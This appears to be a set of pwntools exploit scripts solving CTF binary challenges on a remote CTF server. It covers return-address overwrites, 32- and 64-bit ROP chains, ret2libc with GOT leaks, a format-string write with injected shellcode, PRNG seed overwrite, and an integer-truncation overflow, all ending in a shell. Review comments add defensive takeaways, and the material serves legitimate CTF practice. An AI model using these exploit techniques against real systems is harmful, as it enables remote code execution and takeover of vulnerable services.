Hello_Pwn
hello_pwn2
from pwn import *

# Value placed after the padding; p64() encodes it as 8 little-endian bytes.
# NOTE(review): presumably this lands on a variable the service compares
# against 0x6E756161, 4 bytes past the start of the input buffer - confirm
# against the binary.
MAGIC = 0x6E756161
FILLER = b'M' * 4

io = remote("ctf.nynusec.com", 28944)

# Defensive takeaway: a read bounded to the destination buffer's size keeps
# input from ever reaching a neighbouring variable.
io.sendline(FILLER + p64(MAGIC))
io.interactive()
pwnpwn
from pwn import *

io = remote("ctf.nynusec.com", 28928)

# Fixed code address written over the saved return address.
# NOTE(review): a hard-coded 0x400596 only holds for a non-PIE build; PIE with
# ASLR, or a stack protector, would invalidate this script.
BACKDOOR = 0x400596

# 0x88 filler bytes, then the 8-byte little-endian target address.
# NOTE(review): presumably 0x80 bytes of buffer plus the saved rbp - confirm.
chain = b"".join([b'M' * 0x88, p64(BACKDOOR)])

io.recv()  # read and drop whatever the service sent first
io.sendline(chain)
io.interactive()
easyStack
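# Only pwntools is needed. The stray `from turtle import back` was never used
# (it looks like an editor auto-import) and made the script depend on tkinter,
# so it is removed.
from pwn import *

r = remote("ctf.nynusec.com", 28599)

# Resolve the target function from the local copy of the binary rather than
# hard-coding its address.
# NOTE(review): the symbol value is a usable absolute address only for a
# non-PIE build - confirm.
elf = ELF("easyStack")
backdoor = elf.symbols['fun']

# 0x18 filler bytes followed by the 8-byte little-endian address of `fun`.
# NOTE(review): presumably buffer plus saved rbp - confirm in the binary.
# Defensive takeaway: a bounded read and a stack protector both stop this
# overwrite before the function returns.
payload = b'M' * 0x18 + p64(backdoor)

r.recv()  # read and drop whatever the service sent first
r.sendline(payload)
r.interactive()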
rop_test
from pwn import *

io = remote("ctf.nynusec.com", 28686)
binary = ELF("rop_test")

system_addr = binary.symbols['system']
# NOTE(review): presumably the address of a "/bin/sh" string inside the
# binary - confirm.
bin_sh_addr = 0x804A024

# Hand-built 32-bit call frame, in stack order:
#   filler (0x88 + 4 bytes; presumably buffer plus saved ebp - confirm),
#   address of system() in the return-address slot,
#   4 filler bytes where system()'s own return address sits,
#   the pointer passed as system()'s first argument.
# Defensive takeaway: a bounded read or a stack protector stops the overwrite;
# PIE/ASLR invalidates the fixed addresses.
frame = [
    b'M' * (0x88 + 4),
    p32(system_addr),
    b'M' * 4,
    p32(bin_sh_addr),
]
payload = b"".join(frame)

io.recv()  # read and drop whatever the service sent first
io.sendline(payload)
io.interactive()
pwn_string
from pwn import *

io = remote("ctf.nynusec.com", 28836)
context(log_level = 'debug', arch = 'amd64', os = 'linux')

# The service prints a hex address after 'secret[0] is '; parse it.
io.recvuntil('secret[0] is ')
addr = int(io.recvuntil('\n'), 16)

# Format string: %85d prints an integer padded to 85 characters, %7$n then
# stores that character count through the pointer in the 7th argument slot.
# NOTE(review): presumably that slot holds the address sent just before, and
# the program later tests the value stored there - confirm against the binary.
# Defensive takeaway: user input must never be the format argument;
# printf("%s", buf) removes the write primitive.
payload = '%85d%7$n'

# Scripted dialogue: (text to wait for, line to answer with), in order.
dialogue = (
    ('be:', 'aaa'),
    ('up?:', 'east'),
    ('leave(0)?:', '1'),
    ("address'", str(addr)),
    ('is:', payload),
)
for prompt, answer in dialogue:
    io.sendlineafter(prompt, answer)

# Shell-spawning code assembled by pwntools for the arch set in `context`.
# NOTE(review): presumably the service executes the bytes it reads after
# 'SPELL' - confirm. Defensive takeaway: input buffers should never be mapped
# executable.
shellcode = asm(shellcraft.sh())
io.sendlineafter('SPELL', shellcode)
io.interactive()
pwn_guess
from pwn import *

io = remote("ctf.nynusec.com", 28690)

# 0x20 filler bytes followed by the 64-bit value 1.
# NOTE(review): presumably the name buffer sits 0x20 bytes below the PRNG
# seed, so the seed becomes 1 and the numbers below are the sequence the
# service then generates - confirm against the binary.
# Defensive takeaway: bound the name read, and do not gate anything on rand().
name_field = b'M' * 0x20 + p64(1)
io.recvuntil("name:")
io.sendline(name_field)

# Ten answers, sent in order, one per prompt.
rand = [2, 5, 4, 2, 6, 2, 5, 1, 4, 2]
for guess in rand:
    io.sendlineafter("Please input your guess number:", str(guess))

io.interactive()
pwn_int
from pwn import *

io = remote("ctf.nynusec.com", 28599)
BACKDOOR = 0x804868B

# Two scripted answers; pending output is read and dropped before each one.
# NOTE(review): presumably a menu choice followed by a user name - confirm.
for answer in ("1", "m0sway"):
    io.recv()
    io.sendline(answer)
io.recv()

# 0x14 + 4 filler bytes, the 4-byte little-endian target address, then more
# filler up to a total length of exactly 259 bytes.
# NOTE(review): presumably the service keeps the input length in an 8-bit
# variable, so 259 is seen as 3 and passes a range check before the copy -
# confirm against the binary.
# Defensive takeaway: keep lengths in size_t and validate them before any
# narrowing conversion.
payload = (b'M' * (0x14 + 4) + p32(BACKDOOR)).ljust(259, b'M')
io.sendline(payload)
io.interactive()
S2-stack
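# Only pwntools is needed. The stray `from matplotlib import interactive` was
# never used (r.interactive() below is a method of the connection object) and
# made the script fail on machines without matplotlib, so it is removed.
from pwn import *

r = remote("ctf.nynusec.com", 28052)

# Fixed code address written over the saved return address.
# NOTE(review): a hard-coded address only holds for a non-PIE build - confirm.
backdoor = 0x804850F

# 9 + 4 filler bytes, then the 4-byte little-endian target address.
# NOTE(review): presumably a 9-byte distance to the saved ebp plus the saved
# ebp itself - confirm in the binary.
# Defensive takeaway: a bounded read and a stack protector both stop this
# overwrite before the function returns.
payload = b'M' * (9 + 4) + p32(backdoor)

r.recv()  # read and drop whatever the service sent first
r.sendline(payload)
r.interactive()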
S2-pwn1-rop
from pwn import *

io = remote("ctf.nynusec.com", 28482)
binary = ELF("S2-pwn1-rop")

# NOTE(review): presumably a `pop rdi; ret` sequence and a "/bin/sh" string
# inside the binary - confirm both addresses.
rdi_addr = 0x400683
bin_sh_addr = 0x601048
system_addr = binary.plt['system']

# 64-bit chain, in stack order: filler (0x10 + 8 bytes), the rdi_addr
# gadget, the value it is expected to load into rdi, then system@plt.
# Defensive takeaway: a bounded read or a stack protector stops the
# overwrite; PIE/ASLR invalidates the fixed addresses.
chain = [
    b'M' * (0x10 + 8),
    p64(rdi_addr),
    p64(bin_sh_addr),
    p64(system_addr),
]
payload = b"".join(chain)

io.recv()  # read and drop whatever the service sent first
io.sendline(payload)
io.interactive()
S2-pwn2-libc-rop
from pwn import *
# NOTE(review): nothing below uses LibcSearcher; the libc is loaded from a
# local file instead.
from LibcSearcher import *

io = remote("ctf.nynusec.com", 28455)
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("PWN_libc")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83  # NOTE(review): presumably `pop rdi; ret` - confirm
main_addr = elf.symbols['main']
ret = 0x4006b9       # NOTE(review): presumably a bare `ret` - confirm

# Prefix shared by both stages: one NUL byte, then filler, 0x50 + 8 bytes in
# total.
# NOTE(review): the leading NUL presumably makes a string-length check see an
# empty string - confirm against the binary.
PREFIX = b'\x00' + b'M' * (0x50 + 8 - 1)


def submit(chain):
    """Send '1', then *chain*, dropping pending output before each send."""
    io.recv()
    io.sendline('1')
    io.recv()
    io.sendline(chain)


# Stage 1: call puts(puts_got) to print the resolved address of puts, then
# return to main so the service accepts a second input.
submit(PREFIX + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr))
io.recvline()
io.recvline()
# Six bytes are read and zero-extended to a 64-bit little-endian value.
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))

# Everything else in libc is located relative to the leaked puts address.
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))

# Stage 2: same overwrite, now ending in system("/bin/sh"). The extra `ret`
# entry is presumably there for 16-byte stack alignment - confirm.
# Defensive takeaway: ASLR alone does not help once one pointer leaks; the
# root fix is the unbounded read, with a stack protector as a backstop.
submit(PREFIX + p64(ret) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr))
io.interactive()
libcc
from pwn import *

io = remote("ctf.nynusec.com", 28249)
binary = ELF("level3")
libc = ELF("libc6-i386_2.23-0ubuntu11.3_amd64.so")

write_plt = binary.plt['write']
write_got = binary.got['write']
main_addr = binary.symbols['main']

# Filler shared by both stages.
# NOTE(review): presumably 0x88 bytes of buffer plus the saved ebp - confirm.
PAD = b'M' * (0x88 + 4)

# Stage 1 (32-bit frame): call write(1, write_got, 4) so the service sends
# the resolved address of write, with main as the return address so a second
# input is accepted.
leak_frame = [
    PAD,
    p32(write_plt),
    p32(main_addr),
    p32(1),
    p32(write_got),
    p32(4),
]
payload = b"".join(leak_frame)
io.sendlineafter(b"Input:\n", payload)
write_addr = u32(io.recv(4))

# Everything else in libc is located relative to the leaked write address.
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

# Stage 2: system("/bin/sh"); the 4 filler bytes occupy the slot of
# system()'s own return address.
# Defensive takeaway: ASLR alone does not help once one pointer leaks; the
# root fix is the unbounded read, with a stack protector as a backstop.
payload = b"".join([PAD, p32(system_addr), b'M' * 4, p32(bin_sh_addr)])
io.sendlineafter(b"Input:\n", payload)
io.interactive()
PWN-libc
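# The stray `from git import base` was never used (it looks like an editor
# auto-import) and made the script fail on machines without GitPython, so it
# is removed.
from pwn import *
# NOTE(review): nothing below uses LibcSearcher; the libc is loaded from a
# local file instead.
from LibcSearcher import *

r = remote("ctf.nynusec.com", 28654)
lib = ELF("libc.23.so")
elf = ELF("PWN_libc")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83  # NOTE(review): presumably `pop rdi; ret` - confirm
main_addr = elf.symbols['main']

# Stage 1: one NUL byte and filler (0x50 + 8 bytes in total), then a chain
# that calls puts(puts_got) to print the resolved address of puts and returns
# to main so the service accepts a second input.
# NOTE(review): the leading NUL presumably makes a string-length check see an
# empty string - confirm against the binary.
payload = (
    b'\x00' + b'M' * (0x50 + 8 - 1)
    + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
# Six bytes are read and zero-extended to a 64-bit little-endian value.
puts_addr = u64(r.recv(6).ljust(8, b'\x00'))

# Everything else in libc is located relative to the leaked puts address.
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b"/bin/sh"))
# Computed but not used by payload2 below.
one_gadget_addr = 0x45216 + base_addr

# Stage 2: same overwrite, now ending in system("/bin/sh").
# Defensive takeaway: ASLR alone does not help once one pointer leaks; the
# root fix is the unbounded read, with a stack protector as a backstop.
payload2 = (
    b'\x00' + b'M' * (0x50 + 8 - 1)
    + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)
r.interactive()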